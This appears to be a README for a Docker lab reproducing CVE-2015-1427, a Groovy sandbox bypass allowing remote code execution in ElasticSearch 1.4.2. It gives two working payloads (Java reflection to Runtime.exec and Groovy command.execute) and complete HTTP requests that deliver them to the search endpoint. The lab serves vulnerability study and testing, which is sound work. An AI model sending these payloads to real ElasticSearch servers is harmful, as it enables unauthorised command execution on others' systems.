
Docker-based lab environment for CVE-2015-1427 ElasticSearch Groovy sandbox bypass and remote code execution, demonstrating two POC methods with Java reflection and Groovy command execution.
jre version: openjdk:8-jre
elasticsearch version: v1.4.2
Reference articles:
After CVE-2014-3120, ElasticSearch changed the default dynamic scripting language to Groovy and added a sandbox, but it still supported direct execution of dynamic languages by default. This vulnerability: 1. is a sandbox bypass; 2. is a Groovy code execution vulnerability.
ElasticSearch supports using "sandboxed" Groovy language as dynamic scripts, but obviously the official work was not done well. lupin and tang3 respectively proposed two methods to execute commands:
Therefore, based on these two exploitation ideas, we can obtain two different POCs.
Java sandbox bypass method:
java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()
Groovy direct command execution method:
def command='id';def res=command.execute().text;res
Build and run the test environment
docker-compose build
docker-compose up -d
Since the query requires at least one piece of data in ES, send the following data packet to add a record:
POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{
"name": "test"
}
Then send a data packet containing the payload to execute arbitrary commands:
POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
